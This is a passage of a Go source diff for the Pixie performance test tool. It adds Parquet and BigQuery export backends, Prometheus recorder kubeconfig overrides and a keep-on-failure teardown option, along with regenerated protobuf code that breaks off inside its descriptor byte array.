100644 --- a/src/e2e_test/perf_tool/cmd/run.go +++ b/src/e2e_test/perf_tool/cmd/run.go @@ -45,6 +45,7 @@ import ( "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster/gke" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster/local" + "px.dev/pixie/src/e2e_test/perf_tool/pkg/exporter" "px.dev/pixie/src/e2e_test/perf_tool/pkg/pixie" "px.dev/pixie/src/e2e_test/perf_tool/pkg/run" "px.dev/pixie/src/e2e_test/perf_tool/pkg/suites" @@ -74,9 +75,15 @@ func init() { RunCmd.Flags().String("api_key", "", "The Pixie API key to use for deploying pixie") RunCmd.Flags().String("cloud_addr", "withpixie.ai:443", "The Pixie Cloud address to use for deploying pixie") + RunCmd.Flags().String("export_backend", "bq", "Export backend: 'bq', 'parquet-gcs', or 'parquet-local'") RunCmd.Flags().String("bq_project", "pl-pixies", "The gcloud project to put bigquery results/specs in") RunCmd.Flags().String("bq_dataset", "px_perf", "The name of the bigquery dataset to put results/specs in") RunCmd.Flags().String("bq_dataset_loc", "us-west1", "The gcloud region for the bigquery dataset") + RunCmd.Flags().String("gcs_bucket", "", "GCS bucket for parquet export (required when export_backend=parquet-gcs)") + RunCmd.Flags().String("gcs_prefix", "", "Path prefix within the GCS bucket for parquet export") + RunCmd.Flags().String("parquet_dir", "", "Local directory for parquet export (required when export_backend=parquet-local)") + RunCmd.Flags().String("parquet_prefix", "", "Path prefix within --parquet_dir for parquet export") + RunCmd.Flags().Int("parquet_batch_size", 10000, "Number of rows per parquet file when using a parquet-* backend") RunCmd.Flags().String("gke_project", "pl-pixies", "The gcloud project to use for GKE clusters") RunCmd.Flags().String("gke_zone", "us-west1-a", "The gcloud zone to use for GKE clusters") @@ -95,6 +102,10 @@ func init() { RunCmd.Flags().String("ds_experiment_page_id", "p_g7fj6pf4yc", "The unique ID of the datastudio experiment page, used to print links to datastudio views") RunCmd.Flags().Bool("pretty", false, "Pretty print output json") + RunCmd.Flags().StringSlice("prom_recorder_override", []string{}, "Override kubeconfig/kube_context for a named prometheus recorder. Format: name=kubeconfig_path:kube_context (either side may be empty). Repeatable.") + RunCmd.Flags().Bool("keep_on_failure", false, "If the experiment fails, skip teardown (stop vizier/workloads/recorders and cluster cleanup) so the cluster state can be inspected. Implies --max_retries=1.") + RunCmd.Flags().String("skaffold_stderr_file", "", "If set, skaffold's stderr (build/render output) is appended to this file in addition to perf_tool's stderr. Useful in CI to capture a clean log to cat after a failure.") + RootCmd.AddCommand(RunCmd) } @@ -131,6 +142,15 @@ func runCmd(ctx context.Context, cmd *cobra.Command) error { return err } + promOverrides, err := parsePromRecorderOverrides(viper.GetStringSlice("prom_recorder_override")) + if err != nil { + log.WithError(err).Error("failed to parse --prom_recorder_override flags") + return err + } + for _, spec := range specs { + applyPromRecorderOverrides(spec, promOverrides) + } + var c cluster.Provider if viper.GetBool("use_local_cluster") { c = &local.ClusterProvider{} @@ -162,20 +182,24 @@ func runCmd(ctx context.Context, cmd *cobra.Command) error { } } - resultTable, err := createResultTable() + metricsExporter, err := createExporter(ctx) if err != nil { - log.WithError(err).Error("failed to create results table") - return err - } - specTable, err := createSpecTable() - if err != nil { - log.WithError(err).Error("failed to create spec table") + log.WithError(err).Error("failed to create exporter") return err } + defer metricsExporter.Close() containerRegistryRepo := viper.GetString("container_repo") + skaffoldStderrFile := viper.GetString("skaffold_stderr_file") maxRetries := viper.GetInt("max_retries") numRuns := viper.GetInt("num_runs") + keepOnFailure := viper.GetBool("keep_on_failure") + if keepOnFailure { + if maxRetries > 1 { + log.Warn("--keep_on_failure is set; forcing --max_retries=1 to avoid retries racing with preserved cluster state") + } + maxRetries = 1 + } eg := errgroup.Group{} experiments := make(chan *exp, len(specs)*numRuns) @@ -189,7 +213,7 @@ func runCmd(ctx context.Context, cmd *cobra.Command) error { s := spec n := name eg.Go(func() error { - expID, err := runExperiment(ctx, s, c, pxAPIKey, pxCloudAddr, resultTable, specTable, containerRegistryRepo, maxRetries) + expID, err := runExperiment(ctx, s, c, pxAPIKey, pxCloudAddr, metricsExporter, containerRegistryRepo, skaffoldStderrFile, maxRetries, keepOnFailure) if err != nil { log.WithError(err).Error("failed to run experiment") return err @@ -257,10 +281,11 @@ func runExperiment( c cluster.Provider, pxAPIKey string, pxCloudAddr string, - resultTable *bq.Table, - specTable *bq.Table, + metricsExporter exporter.Exporter, containerRegistryRepo string, + skaffoldStderrFile string, maxRetries int, + keepOnFailure bool, ) (uuid.UUID, error) { var expID uuid.UUID bo := &maxRetryBackoff{ @@ -268,7 +293,8 @@ func runExperiment( } op := func() error { pxCtx := pixie.NewContext(pxAPIKey, pxCloudAddr) - r := run.NewRunner(c, pxCtx, resultTable, specTable, containerRegistryRepo) + r := run.NewRunner(c, pxCtx, metricsExporter, containerRegistryRepo, skaffoldStderrFile) + r.SetKeepOnFailure(keepOnFailure) var err error expID, err = uuid.NewV4() if err != nil { @@ -335,7 +361,32 @@ func getExperimentSpecs() (map[string]*experimentpb.ExperimentSpec, error) { return nil, errors.New("must specify one of --experiment_proto or --suite") } -func createResultTable() (*bq.Table, error) { +func createExporter(ctx context.Context) (exporter.Exporter, error) { + switch viper.GetString("export_backend") { + case "bq": + return createBQExporter() + case "parquet-gcs": + bucket := viper.GetString("gcs_bucket") + if bucket == "" { + return nil, errors.New("--gcs_bucket is required when using parquet-gcs backend") + } + prefix := viper.GetString("gcs_prefix") + batchSize := viper.GetInt("parquet_batch_size") + return exporter.NewParquetGCSExporter(ctx, bucket, prefix, batchSize) + case "parquet-local": + dir := viper.GetString("parquet_dir") + if dir == "" { + return nil, errors.New("--parquet_dir is required when using parquet-local backend") + } + prefix := viper.GetString("parquet_prefix") + batchSize := viper.GetInt("parquet_batch_size") + return exporter.NewParquetLocalExporter(dir, prefix, batchSize) + default: + return nil, fmt.Errorf("unknown export backend: %s", viper.GetString("export_backend")) + } +} + +func createBQExporter() (*exporter.BQExporter, error) { bqProject := viper.GetString("bq_project") bqDataset := viper.GetString("bq_dataset") bqDatasetLoc := viper.GetString("bq_dataset_loc") @@ -343,15 +394,16 @@ func createResultTable() (*bq.Table, error) { Type: bigquery.DayPartitioningType, Field: "timestamp", } - return bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "results", timePartitioning, run.ResultRow{}) -} - -func createSpecTable() (*bq.Table, error) { - bqProject := viper.GetString("bq_project") - bqDataset := viper.GetString("bq_dataset") - bqDatasetLoc := viper.GetString("bq_dataset_loc") - var timePartitioning *bigquery.TimePartitioning - return bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "specs", timePartitioning, run.SpecRow{}) + resultTable, err := bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "results", timePartitioning, exporter.ResultRow{}) + if err != nil { + return nil, err + } + var specTimePartitioning *bigquery.TimePartitioning + specTable, err := bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "specs", specTimePartitioning, exporter.SpecRow{}) + if err != nil { + return nil, err + } + return exporter.NewBQExporter(resultTable, specTable), nil } func getNumNodesInCluster(ctx context.Context, c cluster.Provider) (int, error) { @@ -388,3 +440,50 @@ func datastudioLink(dsReportID string, dsExperimentPageID string, expID uuid.UUI encodedParams := url.QueryEscape(params) return fmt.Sprintf("https://datastudio.google.com/reporting/%s/page/%s?params=%s", dsReportID, dsExperimentPageID, encodedParams) } + +type promRecorderOverride struct { + KubeconfigPath string + KubeContext string +} + +func parsePromRecorderOverrides(raw []string) (map[string]promRecorderOverride, error) { + out := make(map[string]promRecorderOverride, len(raw)) + for _, s := range raw { + nameAndVal := strings.SplitN(s, "=", 2) + if len(nameAndVal) != 2 || nameAndVal[0] == "" { + return nil, fmt.Errorf("invalid --prom_recorder_override %q: expected name=kubeconfig:context", s) + } + parts := strings.SplitN(nameAndVal[1], ":", 2) + ov := promRecorderOverride{KubeconfigPath: parts[0]} + if len(parts) == 2 { + ov.KubeContext = parts[1] + } + if ov.KubeconfigPath == "" && ov.KubeContext == "" { + return nil, fmt.Errorf("invalid --prom_recorder_override %q: at least one of kubeconfig or context must be set", s) + } + out[nameAndVal[0]] = ov + } + return out, nil +} + +func applyPromRecorderOverrides(spec *experimentpb.ExperimentSpec, overrides map[string]promRecorderOverride) { + if len(overrides) == 0 { + return + } + for _, m := range spec.MetricSpecs { + prom := m.GetProm() + if prom == nil || prom.Name == "" { + continue + } + ov, ok := overrides[prom.Name] + if !ok { + continue + } + if ov.KubeconfigPath != "" { + prom.KubeconfigPath = ov.KubeconfigPath + } + if ov.KubeContext != "" { + prom.KubeContext = ov.KubeContext + } + } +} diff --git a/src/e2e_test/perf_tool/experimentpb/experiment.pb.go b/src/e2e_test/perf_tool/experimentpb/experiment.pb.go index dc43e5d79be..923ed6cc1b9 100755 --- a/src/e2e_test/perf_tool/experimentpb/experiment.pb.go +++ b/src/e2e_test/perf_tool/experimentpb/experiment.pb.go @@ -647,8 +647,9 @@ func (m *PatchTarget) GetAnnotationSelector() string { } type PrerenderedDeploy struct { - YAMLPaths []string `protobuf:"bytes,1,rep,name=yaml_paths,json=yamlPaths,proto3" json:"yaml_paths,omitempty"` - Patches []*PatchSpec `protobuf:"bytes,2,rep,name=patches,proto3" json:"patches,omitempty"` + YAMLPaths []string `protobuf:"bytes,1,rep,name=yaml_paths,json=yamlPaths,proto3" json:"yaml_paths,omitempty"` + Patches []*PatchSpec `protobuf:"bytes,2,rep,name=patches,proto3" json:"patches,omitempty"` + SkipNamespaceDelete bool `protobuf:"varint,3,opt,name=skip_namespace_delete,json=skipNamespaceDelete,proto3" json:"skip_namespace_delete,omitempty"` } func (m *PrerenderedDeploy) Reset() { *m = PrerenderedDeploy{} } @@ -697,6 +698,13 @@ func (m *PrerenderedDeploy) GetPatches() []*PatchSpec { return nil } +func (m *PrerenderedDeploy) GetSkipNamespaceDelete() bool { + if m != nil { + return m.SkipNamespaceDelete + } + return false +} + type SkaffoldDeploy struct { SkaffoldPath string `protobuf:"bytes,1,opt,name=skaffold_path,json=skaffoldPath,proto3" json:"skaffold_path,omitempty"` SkaffoldArgs []string `protobuf:"bytes,2,rep,name=skaffold_args,json=skaffoldArgs,proto3" json:"skaffold_args,omitempty"` @@ -1254,6 +1262,9 @@ type PrometheusScrapeSpec struct { Port int32 `protobuf:"varint,4,opt,name=port,proto3" json:"port,omitempty"` ScrapePeriod *types.Duration `protobuf:"bytes,5,opt,name=scrape_period,json=scrapePeriod,proto3" json:"scrape_period,omitempty"` MetricNames map[string]string `protobuf:"bytes,6,rep,name=metric_names,json=metricNames,proto3" json:"metric_names,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` + KubeconfigPath string `protobuf:"bytes,7,opt,name=kubeconfig_path,json=kubeconfigPath,proto3" json:"kubeconfig_path,omitempty"` + KubeContext string `protobuf:"bytes,8,opt,name=kube_context,json=kubeContext,proto3" json:"kube_context,omitempty"` + Name string `protobuf:"bytes,9,opt,name=name,proto3" json:"name,omitempty"` } func (m *PrometheusScrapeSpec) Reset() { *m = PrometheusScrapeSpec{} } @@ -1330,6 +1341,27 @@ func (m *PrometheusScrapeSpec) GetMetricNames() map[string]string { return nil } +func (m *PrometheusScrapeSpec) GetKubeconfigPath() string { + if m != nil { + return m.KubeconfigPath + } + return "" +} + +func (m *PrometheusScrapeSpec) GetKubeContext() string { + if m != nil { + return m.KubeContext + } + return "" +} + +func (m *PrometheusScrapeSpec) GetName() string { + if m != nil { + return m.Name + } + return "" +} + type ClusterSpec struct { NumNodes int32 `protobuf:"varint,1,opt,name=num_nodes,json=numNodes,proto3" json:"num_nodes,omitempty"` Node *NodeSpec `protobuf:"bytes,2,opt,name=node,proto3" json:"node,omitempty"` @@ -1560,119 +1592,124 @@ func init() { } var fileDescriptor_96d7e52dda1e6fe3 = []byte{ - // 1786 bytes of a gzipped FileDescriptorProto - 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xac, 0x58, 0xcd, 0x73, 0x1b, 0x49, - 0x15, 0xd7, 0x48, 0xb2, 0x25, 0x3d, 0xc9, 0xb2, 0xdc, 0xf9, 0x40, 0xf1, 0xa6, 0xe4, 0xec, 0x6c, - 0x01, 0x21, 0xec, 0x5a, 0x24, 0xcb, 0x87, 0xd9, 0x2c, 0x5b, 0x25, 0xc9, 0x06, 0x2b, 0x71, 0x6c, - 0xd1, 0xf2, 0x7a, 0x61, 0x8b, 0xaa, 0xa9, 0xf6, 0x4c, 0x47, 0x9a, 0xf2, 0x7c, 0x65, 0xba, 0x95, - 0xb5, 0x39, 0x71, 0xa1, 0x38, 0x51, 0xc5, 0x01, 0xfe, 0x03, 0x0e, 0xfc, 0x09, 0xdc, 0x39, 0x00, - 0xb7, 0x1c, 0xf7, 0xe4, 0x22, 0xca, 0x85, 0xe3, 0x1e, 0xb8, 0x43, 0xf5, 0xc7, 0x8c, 0x46, 0xb2, - 0x92, 0x40, 0x15, 0xb7, 0x9e, 0x5f, 0xff, 0xde, 0xeb, 0xd7, 0xaf, 0xfb, 0xf7, 0x5e, 0x4b, 0xf0, - 0x5d, 0x16, 0xdb, 0x6d, 0xfa, 0x80, 0x5a, 0x9c, 0x32, 0xde, 0x8e, 0x68, 0xfc, 0xd4, 0xe2, 0x61, - 0xe8, 0xb5, 0xe9, 0x79, 0x44, 0x63, 0xd7, 0xa7, 0x01, 0x8f, 0x4e, 0x33, 0x1f, 0xdb, 0x51, 0x1c, - 0xf2, 0x10, 0xd5, 0xa2, 0xf3, 0xed, 0x94, 0xbb, 0xd9, 0x1a, 0x85, 0xe1, 0xc8, 0xa3, 0x6d, 0x39, - 0x77, 0x3a, 0x79, 0xda, 0x76, 0x26, 0x31, 0xe1, 0x6e, 0x18, 0x28, 0xf6, 0xe6, 0xf5, 0x51, 0x38, - 0x0a, 0xe5, 0xb0, 0x2d, 0x46, 0x0a, 0x35, 0xff, 0x9d, 0x87, 0xfa, 0x5e, 0xea, 0x78, 0x18, 0x51, - 0x1b, 0x3d, 0x84, 0xea, 0x73, 0xf7, 0x97, 0x2e, 0x8d, 0x2d, 0x16, 0x51, 0xbb, 0x69, 0xdc, 0x31, - 0xee, 0x56, 0x1f, 0x6c, 0x6e, 0x67, 0x17, 0xdb, 0xfe, 0x2c, 0x8c, 0xcf, 0xbc, 0x90, 0x38, 0xc2, - 0x00, 0x83, 0xa2, 0x4b, 0xe3, 0x0e, 0xd4, 0xbf, 0xd0, 0x73, 0xd2, 0x9c, 0x35, 0xf3, 0x77, 0x0a, - 0x6f, 0xb1, 0x5f, 0xfb, 0x22, 0xf3, 0xc5, 0xd0, 0x43, 0xa8, 0xf9, 0x94, 0xc7, 0xae, 0xad, 0x1d, - 0x14, 0xa4, 0x83, 0xe6, 0xbc, 0x83, 0x27, 0x92, 0x21, 0xcd, 0xab, 0x7e, 0x3a, 0x66, 0xe8, 0x63, - 0xa8, 0xd9, 0xde, 0x84, 0xf1, 0x24, 0xfa, 0xa2, 0x8c, 0xfe, 0xd6, 0xbc, 0x71, 0x4f, 0x31, 0x94, - 0xb5, 0x3d, 0xfb, 0x40, 0xdf, 0x81, 0x72, 0x3c, 0x09, 0x94, 0xe5, 0x8a, 0xb4, 0xbc, 0x31, 0x6f, - 0x89, 0x27, 0x81, 0xb4, 0x2a, 0xc5, 0x6a, 0x80, 0xde, 0x07, 0xb0, 0x43, 0xdf, 0x77, 0xb9, 0xc5, - 0xc6, 0xa4, 0xb9, 0x7a, 0xc7, 0xb8, 0x5b, 0xe9, 0xae, 0x4d, 0x2f, 0xb7, 0x2a, 0x3d, 0x89, 0x0e, - 0xf7, 0x3b, 0xb8, 0xa2, 0x08, 0xc3, 0x31, 0x41, 0x08, 0x8a, 0x9c, 0x8c, 0x58, 0xb3, 0x74, 0xa7, - 0x70, 0xb7, 0x82, 0xe5, 0xd8, 0xfc, 0xab, 0x01, 0xb5, 0x6c, 0x3a, 0x04, 0x29, 0x20, 0x3e, 0x95, - 0x89, 0xaf, 0x60, 0x39, 0x16, 0x39, 0x71, 0x68, 0xe4, 0x85, 0x17, 0x16, 0xe3, 0x34, 0x4a, 0x92, - 0xba, 0x90, 0x93, 0x5d, 0xc9, 0x18, 0x72, 0x1a, 0xe1, 0xaa, 0x93, 0x8e, 0x19, 0xfa, 0x11, 0xd4, - 0xc6, 0x94, 0x78, 0x7c, 0x6c, 0x8f, 0xa9, 0x7d, 0x96, 0x24, 0x74, 0x21, 0x27, 0xfb, 0x92, 0xd1, - 0x13, 0x0c, 0x3c, 0x47, 0x47, 0xdf, 0x84, 0x75, 0x62, 0x8b, 0x8b, 0x64, 0x31, 0xea, 0x51, 0x9b, - 0x87, 0xb1, 0xcc, 0x6a, 0x05, 0xd7, 0x15, 0x3c, 0xd4, 0xa8, 0xf9, 0x77, 0x03, 0x60, 0x16, 0x03, - 0xea, 0x41, 0x35, 0x8a, 0x69, 0x4c, 0x03, 0x87, 0xc6, 0xd4, 0xd1, 0xf7, 0x68, 0x6b, 0x7e, 0xd5, - 0xc1, 0x8c, 0xa0, 0x2c, 0xf7, 0x73, 0x38, 0x6b, 0x85, 0x3e, 0x82, 0x32, 0x3b, 0x23, 0x4f, 0x9f, - 0x86, 0x9e, 0xd3, 0xcc, 0x4b, 0x0f, 0xb7, 0xe7, 0x3d, 0x0c, 0xf5, 0x6c, 0x6a, 0x9e, 0xf2, 0xd1, - 0xb7, 0x21, 0x1f, 0x9d, 0x37, 0x0b, 0xcb, 0x6e, 0xc0, 0xe0, 0xbc, 0x77, 0xd0, 0x4f, 0x4d, 0xf2, - 0xd1, 0x79, 0x77, 0x0d, 0x74, 0xce, 0x2c, 0x7e, 0x11, 0x51, 0xf3, 0xf7, 0x06, 0x54, 0x33, 0x29, - 0x41, 0x1f, 0x43, 0xe1, 0x6c, 0x87, 0x2d, 0xdf, 0xc4, 0xe3, 0x9d, 0xe1, 0x20, 0x74, 0x18, 0xa6, - 0xc4, 0xb9, 0x90, 0xec, 0x6e, 0x69, 0x7a, 0xb9, 0x55, 0x78, 0xbc, 0x33, 0xdc, 0xcf, 0x61, 0x61, - 0x86, 0x7e, 0x08, 0x85, 0xe8, 0xdc, 0x5b, 0xbe, 0x81, 0xc1, 0xf9, 0x41, 0x66, 0x21, 0x65, 0x2a, - 0xb0, 0x1c, 0x16, 0x36, 0xdd, 0x1a, 0x80, 0x3c, 0x07, 0x15, 0xd6, 0x7d, 0xd8, 0xb8, 0xb2, 0x1a, - 0xba, 0x0d, 0x15, 0x71, 0x49, 0x58, 0x44, 0xec, 0xe4, 0xd6, 0xcc, 0x00, 0xf3, 0x08, 0xea, 0xf3, - 0x4b, 0xa0, 0x9b, 0xb0, 0xca, 0xec, 0xd8, 0x8d, 0xb8, 0x26, 0xeb, 0x2f, 0xf4, 0x75, 0xa8, 0xb3, - 0x89, 0x6d, 0x53, 0xc6, 0x2c, 0x3b, 0xf4, 0x26, 0x7e, 0x20, 0x03, 0xae, 0xe0, 0x35, 0x8d, 0xf6, - 0x24, 0x68, 0xfe, 0x02, 0x2a, 0x03, 0xc2, 0xed, 0xb1, 0xbc, 0xac, 0xb7, 0xa1, 0x78, 0x41, 0x7c, - 0x4f, 0x79, 0xea, 0x96, 0xa7, 0x97, 0x5b, 0xc5, 0x9f, 0x77, 0x9e, 0x1c, 0x60, 0x89, 0xa2, 0xfb, - 0xb0, 0xca, 0x49, 0x3c, 0xa2, 0x5c, 0x6f, 0x7d, 0xf1, 0x14, 0x84, 0x9b, 0x63, 0x49, 0xc0, 0x9a, - 0x68, 0xfe, 0x26, 0x0f, 0xd5, 0x0c, 0x8e, 0xbe, 0x05, 0x15, 0x12, 0xb9, 0xd6, 0x28, 0x0e, 0x27, - 0x91, 0x5e, 0xa5, 0x36, 0xbd, 0xdc, 0x2a, 0x77, 0x06, 0xfd, 0x9f, 0x08, 0x0c, 0x97, 0x49, 0xe4, - 0xca, 0x11, 0x6a, 0x43, 0x55, 0x50, 0x9f, 0xd3, 0x98, 0xb9, 0xa1, 0x0e, 0xbe, 0x5b, 0x9f, 0x5e, - 0x6e, 0x41, 0x67, 0xd0, 0x3f, 0x51, 0x28, 0x06, 0x12, 0xb9, 0x7a, 0x2c, 0x94, 0x76, 0xe6, 0x06, - 0x8e, 0xbc, 0x22, 0x15, 0x2c, 0xc7, 0xa9, 0xfa, 0x8a, 0x19, 0xf5, 0xcd, 0x25, 0x78, 0x65, 0x21, - 0xc1, 0x22, 0x6d, 0x1e, 0x39, 0xa5, 0xde, 0x4c, 0x1e, 0xab, 0x2a, 0x6d, 0x12, 0x4d, 0xd4, 0x81, - 0xda, 0x70, 0x8d, 0x04, 0x41, 0xc8, 0xc9, 0xbc, 0x94, 0x4a, 0x92, 0x8b, 0x66, 0x53, 0xa9, 0x9c, - 0x38, 0x6c, 0x5c, 0x91, 0x87, 0xa8, 0x37, 0x22, 0xb3, 0x56, 0x44, 0xf8, 0x58, 0x5c, 0xc7, 0x42, - 0x52, 0x6f, 0x44, 0xd6, 0x07, 0x02, 0xc4, 0x15, 0x41, 0x90, 0x43, 0x74, 0x1f, 0x4a, 0x91, 0xc8, - 0x25, 0x4d, 0x2a, 0xc6, 0xd7, 0x96, 0x1c, 0x80, 0x2a, 0x68, 0x9a, 0x67, 0xfe, 0xd6, 0x80, 0xfa, - 0xbc, 0xa6, 0xd0, 0x7b, 0xb0, 0x96, 0x68, 0x4a, 0xae, 0xab, 0xaf, 0x4d, 0x2d, 0x01, 0xc5, 0x5a, - 0x73, 0x24, 0x12, 0x8f, 0xd4, 0x82, 0x19, 0x52, 0x27, 0x1e, 0xcd, 0xc5, 0x53, 0xf8, 0x2f, 0xe3, - 0xb9, 0x80, 0x6a, 0x46, 0xac, 0xe2, 0x78, 0xa4, 0x77, 0x43, 0x55, 0x50, 0x31, 0x46, 0x2d, 0x80, - 0xf4, 0x34, 0x92, 0x75, 0x33, 0x08, 0xfa, 0x3e, 0xd4, 0x19, 0xe5, 0x56, 0xd2, 0x17, 0x5c, 0x75, - 0xe0, 0xe5, 0x6e, 0x63, 0x7a, 0xb9, 0x55, 0x1b, 0x52, 0xae, 0xdb, 0x41, 0x7f, 0x17, 0xd7, 0xd8, - 0xec, 0xcb, 0x31, 0xff, 0x6c, 0x00, 0xcc, 0xfa, 0x0c, 0xda, 0x51, 0x22, 0x56, 0x25, 0xe0, 0x9d, - 0x2b, 0x22, 0x1e, 0x4a, 0x11, 0x09, 0xe6, 0xa2, 0x86, 0xd1, 0x0e, 0x14, 0xa3, 0x38, 0xf4, 0xb5, - 0x08, 0xcc, 0xc5, 0x12, 0x18, 0xfa, 0x94, 0x8f, 0xe9, 0x84, 0x0d, 0xed, 0x98, 0x44, 0x54, 0x78, - 0xd8, 0xcf, 0x61, 0x69, 0xb1, 0xac, 0xf6, 0x3a, 0xcb, 0x6a, 0xaf, 0x28, 0x5f, 0xba, 0x69, 0xca, - 0x3a, 0x31, 0x2d, 0xc0, 0xda, 0x5c, 0x4c, 0xaf, 0x15, 0xfd, 0x6d, 0xa8, 0x30, 0x1e, 0x53, 0xe2, - 0xbb, 0xc1, 0x48, 0x06, 0x58, 0xc6, 0x33, 0x00, 0xfd, 0x18, 0x36, 0xec, 0xd0, 0x13, 0x6b, 0x88, - 0x18, 0xc4, 0x33, 0x21, 0x74, 0xd2, 0x8a, 0xaa, 0x1e, 0x1c, 0xdb, 0xc9, 0x83, 0x63, 0x7b, 0x57, - 0x3f, 0x38, 0x70, 0x63, 0x66, 0x33, 0x90, 0x26, 0xe8, 0x67, 0xb0, 0xce, 0xa9, 0x1f, 0x79, 0x84, - 0x53, 0xeb, 0x39, 0xf1, 0x26, 0x94, 0x35, 0x8b, 0xf2, 0x02, 0xb4, 0xdf, 0x90, 0xc7, 0xed, 0x63, - 0x6d, 0x72, 0x22, 0x2d, 0xf6, 0x02, 0x1e, 0x5f, 0xe0, 0x3a, 0x9f, 0x03, 0x11, 0x86, 0x35, 0x4e, - 0x4e, 0x3d, 0x6a, 0x85, 0x13, 0x1e, 0x4d, 0x38, 0x6b, 0xae, 0x48, 0xbf, 0x1f, 0xbc, 0xd1, 0xaf, - 0x30, 0x38, 0x52, 0x7c, 0xe5, 0xb5, 0xc6, 0x33, 0xd0, 0x66, 0x07, 0xae, 0x2d, 0x59, 0x1a, 0x35, - 0xa0, 0x70, 0x46, 0x2f, 0x74, 0xfe, 0xc4, 0x10, 0x5d, 0x87, 0x15, 0xb9, 0x1b, 0x5d, 0x28, 0xd5, - 0xc7, 0x47, 0xf9, 0x1d, 0x63, 0xf3, 0x14, 0x36, 0xae, 0xac, 0xb2, 0xc4, 0xc1, 0x0f, 0xb2, 0x0e, - 0xaa, 0x0f, 0xde, 0x7d, 0x4d, 0xd4, 0xca, 0xcb, 0x81, 0xcb, 0x78, 0x66, 0x0d, 0x13, 0xc3, 0xb5, - 0x25, 0x0c, 0xf4, 0x10, 0x4a, 0x49, 0x2e, 0x0c, 0x99, 0x8b, 0x37, 0x7b, 0x55, 0x72, 0xd3, 0x16, - 0xe6, 0x5f, 0x8c, 0x2b, 0x4e, 0xe5, 0xf5, 0x79, 0x04, 0x6b, 0xcc, 0x0d, 0x46, 0x1e, 0xb5, 0xd4, - 0x35, 0xd3, 0x32, 0x78, 0x6f, 0xa1, 0x19, 0x4b, 0x8a, 0xd2, 0xcc, 0xe0, 0xfc, 0x40, 0xd9, 0xef, - 0xe7, 0x70, 0x8d, 0x65, 0x26, 0xd0, 0x4f, 0x61, 0xc3, 0x21, 0x9c, 0x58, 0x5e, 0x28, 0x3b, 0xcd, - 0x24, 0xe0, 0x34, 0xd6, 0x09, 0x58, 0xf0, 0xb7, 0x4b, 0x38, 0x39, 0x08, 0x45, 0xe7, 0x91, 0xa4, - 0xd4, 0xdf, 0xba, 0x33, 0x3f, 0x21, 0xae, 0xbf, 0xda, 0x81, 0x7c, 0xbb, 0x99, 0x7f, 0x30, 0xe0, - 0xc6, 0xd2, 0x58, 0x44, 0x99, 0xe2, 0xae, 0x4f, 0x19, 0x27, 0x7e, 0x24, 0xba, 0x5c, 0x52, 0xcb, - 0x52, 0xb0, 0x17, 0x7a, 0x68, 0x2b, 0x15, 0x93, 0x6c, 0x05, 0xea, 0x70, 0x41, 0x41, 0x87, 0xa2, - 0x21, 0xbc, 0x03, 0x15, 0x79, 0x0c, 0xd2, 0x83, 0xea, 0x1e, 0x65, 0x09, 0x08, 0xeb, 0x5b, 0x50, - 0xe6, 0x64, 0x24, 0xa6, 0xd4, 0x25, 0xaf, 0xe0, 0x12, 0x27, 0xa3, 0x5e, 0xe8, 0x31, 0xf1, 0x42, - 0xba, 0xb1, 0x74, 0x4f, 0xff, 0xa7, 0xb8, 0xee, 0x01, 0x30, 0xfa, 0xcc, 0x72, 0x9d, 0x59, 0x60, - 0xaa, 0x5b, 0x0e, 0xe9, 0xb3, 0xfe, 0x6e, 0x2f, 0xf4, 0x70, 0x99, 0xd1, 0x67, 0x7d, 0x47, 0x38, - 0xfb, 0x04, 0xd6, 0x74, 0xca, 0xb4, 0xac, 0x8b, 0x6f, 0x93, 0x75, 0x4d, 0xf1, 0x95, 0xa4, 0xcd, - 0x7f, 0xe5, 0xe1, 0xfa, 0xb2, 0xda, 0xf5, 0xe6, 0xe7, 0x08, 0xfa, 0x06, 0xac, 0xfb, 0xa2, 0xb4, - 0x5b, 0xaa, 0x67, 0x0a, 0x3d, 0xe8, 0x57, 0x86, 0x84, 0x0f, 0x04, 0xfa, 0x98, 0x5e, 0xa0, 0x7b, - 0xb0, 0x91, 0xe5, 0x29, 0x95, 0xa8, 0x54, 0xaf, 0xcf, 0x98, 0x52, 0x9e, 0xa2, 0x29, 0x44, 0x61, - 0xcc, 0xe5, 0x0e, 0x56, 0xb0, 0x1c, 0x8b, 0xed, 0x31, 0x19, 0x53, 0xb2, 0xbd, 0x95, 0xb7, 0x6e, - 0x4f, 0xf1, 0x75, 0xc5, 0x3a, 0x49, 0x7f, 0x85, 0xc8, 0xd8, 0x9b, 0xab, 0x52, 0x4a, 0x1f, 0xbe, - 0xbd, 0x76, 0xeb, 0x9f, 0x26, 0xe2, 0x3c, 0x74, 0x71, 0xa9, 0xce, 0x4e, 0x88, 0x6d, 0x7e, 0x02, - 0x8d, 0x45, 0xc2, 0xff, 0x52, 0x58, 0xcc, 0x13, 0xa8, 0x66, 0x7e, 0xbe, 0x88, 0x9b, 0x18, 0x4c, - 0x7c, 0x2b, 0x08, 0x1d, 0xaa, 0x5e, 0xa7, 0x2b, 0xb8, 0x1c, 0x4c, 0xfc, 0x43, 0xf1, 0x8d, 0xee, - 0x41, 0x51, 0x4c, 0x68, 0x6d, 0xdd, 0x9c, 0x8f, 0x5d, 0x50, 0xa4, 0xf6, 0x25, 0xc7, 0xfc, 0x00, - 0xca, 0x09, 0x82, 0xde, 0x85, 0x9a, 0x4f, 0xec, 0xb1, 0x1b, 0x50, 0xd9, 0x4d, 0x74, 0x60, 0x55, - 0x8d, 0x1d, 0x8b, 0x06, 0xd3, 0x87, 0x92, 0xfe, 0x2d, 0x84, 0x1e, 0x40, 0x49, 0x35, 0xa3, 0xd7, - 0xfc, 0x54, 0xeb, 0xa8, 0x4e, 0x25, 0xcb, 0x8c, 0x26, 0x3e, 0x2a, 0x96, 0x8d, 0x46, 0xfe, 0x51, - 0xb1, 0x9c, 0x6f, 0x14, 0xcc, 0x5f, 0x1b, 0x00, 0x33, 0x0e, 0x7a, 0x1f, 0x8a, 0xe9, 0xa2, 0xf5, - 0xe5, 0xbe, 0x44, 0x04, 0x58, 0xb2, 0xd0, 0xf7, 0xa0, 0x9c, 